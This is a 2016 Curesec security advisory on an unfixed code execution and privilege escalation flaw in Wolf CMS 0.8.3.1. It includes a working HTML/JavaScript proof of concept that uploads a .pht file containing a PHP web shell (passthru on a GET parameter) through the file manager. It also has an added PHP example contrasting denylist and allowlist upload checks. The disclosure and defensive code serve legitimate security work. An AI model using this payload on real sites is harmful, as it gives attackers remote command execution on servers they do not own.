Wolf CMS v0.8.3.1: Code Execution & Privilege Escalation

Date: 2016-01-28 09:48:23
Security Advisory – Curesec Research Team

1. Introduction

Affected Product: Wolf CMS v0.8.3.1
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: https://www.wolfcms.org/
Vulnerability Type: Code Execution & Privilege Escalation
Remote Exploitable: Yes
Reported to vendor: 12/10/2015
Disclosed to public: 01/28/2016
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of curesec GmbH

2. Overview

CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Wolf CMS is a content management system written in PHP. In version 0.8.3.1, it is vulnerable to code execution. Additionally, the distinction between the user roles Editor, Developer, and Admin is weak, as it is possible for a user to escalate their privileges.

An Editor account is required to exploit this issue.

3. Details: Code Execution

Editors cannot upload php or php4 files. They can, however, upload pht or php5 files, which most default Apache configurations execute as PHP. Additionally, they can upload .htaccess files, which, if the server parses them, allow PHP code execution from arbitrary file types, such as image files.

Proof of Concept:

<html>
<body>
<script>
function submitRequest() {
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "http://localhost/wolfcms/?/admin/plugin/file_manager/upload", true);
  xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
  xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------45938481419296872941792416751");
  xhr.withCredentials = true;
  var body = "-----------------------------45938481419296872941792416751\r\n" +
    "Content-Disposition: form-data; name=\"csrf_token\"\r\n" +
    "\r\n" +
    "961550c7140afaa6f10acc2be52f91146a1738b3809a55530ee7199d7a777162\r\n" +
    "-----------------------------45938481419296872941792416751\r\n" +
    "Content-Disposition: form-data; name=\"upload[path]\"\r\n" +
    "\r\n" +
    "/\r\n" +
    "-----------------------------45938481419296872941792416751\r\n" +
    "Content-Disposition: form-data; name=\"upload_file\"; filename=\"test.pht\"\r\n" +
    "Content-Type: application/octet-stream\r\n" +
    "\r\n" +
    "\x3c?php \n" +
    "passthru($_GET[\'x\']);\n" +
    "\r\n" +
    "-----------------------------45938481419296872941792416751\r\n" +
    "Content-Disposition: form-data; name=\"commit\"\r\n" +
    "\r\n" +
    "Upload\r\n" +
    "-----------------------------45938481419296872941792416751--\r\n";
  var aBody = new Uint8Array(body.length);
  for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i);
  xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
  <input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
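As an added illustration (not part of this advisory and not Wolf CMS's own code), the following PHP contrasts an extension denylist that refuses only php and php4, as described above, with an allowlist check that also refuses dotfiles such as .htaccess and multi-extension names; the function names and sample filenames are constructed for this example.

```php
<?php
// Added example, not Wolf CMS code. Function names are hypothetical.

// Denylist behaving as the advisory describes: only "php" and "php4" are refused,
// so "pht", "php5" and ".htaccess" all pass.
function denylist_allows(string $filename): bool {
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    return !in_array($ext, ['php', 'php4'], true);
}

// Allowlist: the name must have exactly one extension from a known-safe set,
// and dotfiles are refused outright. Even with this check, the upload
// directory should be kept outside the web root or served with PHP
// execution disabled, so a bypass cannot turn into code execution.
function allowlist_allows(string $filename): bool {
    $allowed = ['jpg', 'jpeg', 'png', 'gif', 'pdf', 'txt'];
    $base = basename($filename);
    if ($base === '' || $base[0] === '.') {
        return false;                       // refuses .htaccess and other dotfiles
    }
    $parts = explode('.', $base);
    if (count($parts) !== 2 || $parts[0] === '') {
        return false;                       // exactly one extension, non-empty stem
    }
    return in_array(strtolower($parts[1]), $allowed, true);
}

// Constructed sample filenames, including the extensions the advisory names.
$samples = [
    'logo.png', 'test.php', 'test.php4', 'test.pht',
    'test.php5', '.htaccess', 'shell.php.jpg', 'report.PDF',
];
foreach ($samples as $name) {
    printf("%-14s denylist=%-5s allowlist=%s\n", $name,
        denylist_allows($name) ? 'pass' : 'block',
        allowlist_allows($name) ? 'pass' : 'block');
}
```

Running it shows test.pht, test.php5 and .htaccess passing the denylist but being refused by the allowlist, while logo.png and report.PDF pass both.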

3. Details: Privilege Escalation

The distinction between the user roles Admin and Developer is meaningless, as both can gain code execution via the snippet and layout editors:

http://localhost/wolfcms/?/admin/snippet/edit/2
http://localhost/wolfcms/?/admin/layout/edit/3

The distinction between the Editor and Admin roles is also weak, as editors are allowed to post JavaScript code, which lets them escalate their privileges.

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

12/10/2015 Informed Vendor about Issue (no reply)
01/10/2016 Reminded Vendor of Disclosure Date (no reply)
01/28/2016 Disclosed to public